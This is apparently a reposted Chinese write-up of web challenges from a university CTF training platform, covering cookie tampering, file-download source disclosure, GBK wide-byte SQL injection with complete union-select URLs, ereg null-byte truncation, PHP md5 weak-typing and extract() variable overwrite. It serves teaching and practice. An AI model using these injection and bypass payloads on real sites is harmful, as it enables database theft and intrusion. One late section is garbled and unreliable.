2. 程式人生 > >南郵CTF-WEB-write-up 教程詳細解說

南郵CTF-WEB-write-up 教程詳細解說

阿新 發佈:2019-01-11

單身一百年也沒用

傳送門:biu~

如圖所示

單擊之後,跟我說沒有key
這裡寫圖片描述

這種題目就直接用burpsuit抓包,觀察請求迴應資訊
這裡寫圖片描述
答案很明顯了,flag出來了

Download~!

想下啥就下啥~別下音樂,不騙你,試試下載其他東西~
真·奧義·傳送:點我
這裡寫圖片描述
點選了那兩個音樂連結,發現是正常的音樂檔案,審查一下元素,發現了問題這裡寫圖片描述
這裡的連結很可能存在檔案包含漏洞,可以試試用download.php的base64編碼看看能否取出原始碼。
這裡寫圖片描述
獲得download的原始碼
審計程式碼發現這裡面有一個include(“hereiskey.php”);我們繼續按著前面的思路得到原始碼
這裡寫圖片描述
flag到手了

COOKIE就是甜餅的意思~
地址:傳送門
TIP: 0==not
這題目一進來啥也沒有,根據提示,看來是要抓包分析了
這裡寫圖片描述發現了Cookie: Login=0,前面的提示是0==not ,那麼1應該就是==yes 咯
這裡寫圖片描述flag到手了!

MYSQL

不能每一題都這麼簡單嘛
你說是不是?
題目地址
這裡寫圖片描述這題涉及到了每個網站都有的robots.txt,直接在url裡面轉入robots.txt
這裡寫圖片描述
這裡,提示了我們sql.php,進行程式碼審計吧,審計發現:intval()將變數轉成整數型別,且,數值不能是1024,那麼就有可能是小數咯
這裡寫圖片描述flag到手

sql injection 3

關於這題,大家可以看看我在簡書上寫的sqlmap相關該題題解:點我
here
這裡寫圖片描述這裡看連結名字就看出來了,GBK寬位元組注入啊,寬位元組注入需要用到啥?%df之類的(具體的寬位元組注入方面的內容這裡不贅述了,大家百度一下)
這裡寫圖片描述
這裡寫圖片描述
經過這兩個,大家可以看到,order by 2 和顯示位為 “2” ,接下來可以順利進行爆庫,查詢名為’sae-chinalover’的資料庫的表
database

查表
這裡寫圖片描述
這裡寫圖片描述
這裡寫圖片描述
這裡寫圖片描述
相關程式碼

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from
 
%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%200,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%201,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%202,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%203,1%23

經一步步查詢,得到flag在ctf4中

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x63746634%20limit%200,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x63746634%20limit%201,1%23

flag

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,flag%20from%20ctf4%23

這裡寫圖片描述

/x00

題目地址:題目有多種解法,你能想出來幾種?
這裡寫圖片描述這題目要求我們輸入一個nctf的引數值,且這個引數值必須為 1. 數字 2. #biubiubiu 就是讓我們繞過判斷語句

ereg的漏洞: 會被%00截斷及遇到%00則預設為字串的結束
所以我們可以構造繞過語句:nctf=1%00%23biubiubiu
這裡寫圖片描述

http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%00%23biubiubiu

bypass again

地址:依舊是弱型別
這裡寫圖片描述通過審計程式碼,發現他讓你既要a!=b 又要 md5的a b值相等。
這裡寫圖片描述

這裡寫圖片描述

  1. 240610708跟QNKCDZO 利用不同的字串可能產生相同的md5 繞過
  2. a[]=1&b[]=2 利用php get 可以陣列,而md5() 不能處理陣列

變數覆蓋

聽說過變數覆蓋麼?
地址: 題目地址
開啟頁面後發現有個原始碼“source at /source.php” 點選進去是讓我們程式碼審計與變數覆蓋有關:經查詢,變數覆蓋與程式碼中的extract()有關,這裡放出一個連結,與變數覆蓋的相關知識有關,大家可以看看:點我
這裡是 extract($_POST);提交引數 我們可以抓包修改
這裡寫圖片描述
payload:pass=1&thepassword_123=1

PHP是世界上最好的語言

聽說PHP是世界上最好的語言
地址:題目地址
這裡寫圖片描述
tips我們還有一個index.txt檔案
這裡寫圖片描述
程式碼審計了,要繞過if(eregi(“hackerDJ”, GET[id]))
並確保經過urldecode(GET[id])GET[id]==hackerDJeregiphpidURLURLGET[id]=urldecode(GET[id]);,hackerDJURL_GET[id] == “hackerDJ”
flag

相關推薦

CTF-WEB-write-up 教程詳細解說

單身一百年也沒用 傳送門:biu~ 單擊之後,跟我說沒有key 這種題目就直接用burpsuit抓包,觀察請求迴應資訊 答案很明顯了,flag出來了 Download~! 想下啥就下啥~別下音樂,不騙你,試試下載其他東西

CTF web題目總結

這幾天寫了南郵的web題目,都比較基礎,但是對我這個小白來說還是收穫蠻大的。可以藉此總結一下web題的型別一,資訊都藏在哪作為ctf題目,肯定是要有些提示的,這些提示有時會在題目介紹裡說有時也會隱藏在某些地方。1,原始碼,這是最最最常見的。2,http head頭中,這個一般

CTF練習題——web

南郵CTF練習題(http://ctf.nuptzj.cn/) web(缺注入實戰1,好像網炸了): 簽到題:(http://chinalover.sinaapp.com/web1/) 直接右鍵檢視原始碼得到flag 關鍵是<a style="display:none

ctf

body 圖片 decode info bubuko 發送 img 抓包 一個 這題不是web題 打開發現是一個圖,改為txt和壓縮都不行,就使用了hxd工具發現其flag; 層層遞進 打開其源代碼,會發現其有一個非常特殊的鏈接so.html其長度為0,然後依次點擊會發

ctf平臺 逆向 WxyVM2

直接 IDA F5出原始碼, 非常好懂,就是做比較 for ( i = 0; i <= 24; ++i ) { if ( *(&byte_694100 + i) != dword_694060[i] ) v1 = 0; } 但是這段程式碼之前有

CTF攻城記(6)

總結參考:https://blog.csdn.net/u012763794/article/details/50959166 密碼重置 Q: S: 首先隨便輸入密碼,並正確輸入驗證碼,進行操作。 事實上,我對這個error不感冒,首先直接說賬號為ctfuser,

ctf逆向最後一題

你大概需要一個優秀的mac //雖然是osx下的程式,但並不一定真的要有mac…. 正好我也沒mac,只能拖到ida裡面了,發現還真可以….ida有點厲害 找到right wrong字串,觀察下主框架然後果斷f5看下虛擬碼 可以看出來就是簡單的輸

CTF逆向題第五道maze解題思路

如題 先百度一下名字 萬一有收穫呢 猜測可能考到迷宮演算法 依舊是ELF 直接載入IDA 我一般習慣先shift+f12看下字串 再看看main __int64 __fastcall main(__int64 a1,char**a2,char**a3) { con

CTF逆向題第一道Hello,RE!解題思路

首先可以看到提示如下 我還是查了一下 無殼 提示用IDA 那我們就載入 shift+f12查詢字串 雙擊進入 在右側視窗接著雙擊 然後f5看到了虛擬碼 於是點選字串全按R即可 我再用OD試一下 段首F2下斷 F9執行 段下來後接著單步 走到這個call

ctf-密碼學(前五題)

寫writeup之前先來介紹一下Base編碼系列:base16,base32與base64。 1. Base16編碼使用16個ASCII可列印字元(數字0-9和字母A-F)對任意位元組資料進行編碼。Base16先獲取輸入字串每個位元組的二進位制值(不足8位元在高位補0),

CTF逆向題第六道WxyV2解題思路

如題 看提示應該與第四道題WxyVM一樣是ELF檔案 那麼我們直接上IDAx64 首先找到main函式 還是習慣性檢視下可疑字串 按下F5檢視虛擬碼(中間有大段 我省略截圖了) 這次就不一行一行分析了 大致意思是: 獲取一個字串存放到地址694100處 限制

170707 逆向-CTF逆向(WxyVM1)

1625-5 王子昂 總結《2017年7月7日》 【連續第278天總結】 A. 南郵CTF逆向(4) B. 4: 記事本打開發現檔案頭是ELF,拖入IDA進行反編譯,發現只有幾

ctf平臺部分題解

我沒思路,隊友說QNKCDZO的MD5值是0E開頭的,於是秒懂,因為比較的是兩個串 但是可以解析成數字,也就是說,結果都是0.。。 於是去找md5值前兩位是0E的字串,一開始找到這個: 但放上去居然不對,提示我false,我就不理解了 之後又把QNKCDZO的MD5值搜了一下,然後就找到了 思路很

bugku Web write up

XSS 先來最簡單的彈窗 ?id=<srcipt>altert(/xss/)</script> 檢視原始碼 發現<>被過濾掉了 這裡學到一個技巧,就是用Unicode編碼繞過 payload:?id=\u0

CTF逆向題第三道Py交易解題思路

首先看題 下載後顯示為Py.pyc 嘗試notepad++開啟顯示亂碼 所以直接百度 #!/usr/bin/env python # encoding: utf-8 import

CTF:密碼學 base64全家桶

條件: 提示base64全家桶 密文:R1pDVE1NWlhHUTNETU4yQ0dZWkRNTUpYR00zREtNWldHTTJES 1JSV0dJM0RDTlpUR1kyVEdNWlRHST

密碼重置(CTF

密碼重置 300 重置管理員賬號:admin 的密碼 你在點選忘記密碼之後 你的郵箱收到了這麼一封重置密碼的郵件: 用burp擷取後修改使用者為admin,因為它要求重置管理員密碼 改

CTF平臺-Vigenere題解(窮舉法)

題目提示使用重合因子,但是我嘗試失敗了以下為解題思路:假設加密者使用的金鑰為vigenerekey,長度為keylen,密文為字串arr那麼字串subarr0=arr[0]+arr[keylen]+arr[keylen*2]……是被vigenerekey[0]解密的內容依次類

CTF WxyVM

拿到題目,用IDA開啟,F5d得到如下程式碼 第一個函式先對輸入進行encode 下面進行依次比較。 開啟encode函式 三個數字一組,進行操作。 於是dump出資料寫出指令碼。 import struct checkData = o

170708 逆向-CTF逆向(maze)

1625-5 王子昂 總結《2017年7月8日》 【連續第279天總結】 A. 南郵CTF逆向(5、6) B. 5: 又是maze,拖到IDA分析後發現主要內容就在main中: if ( strlen(&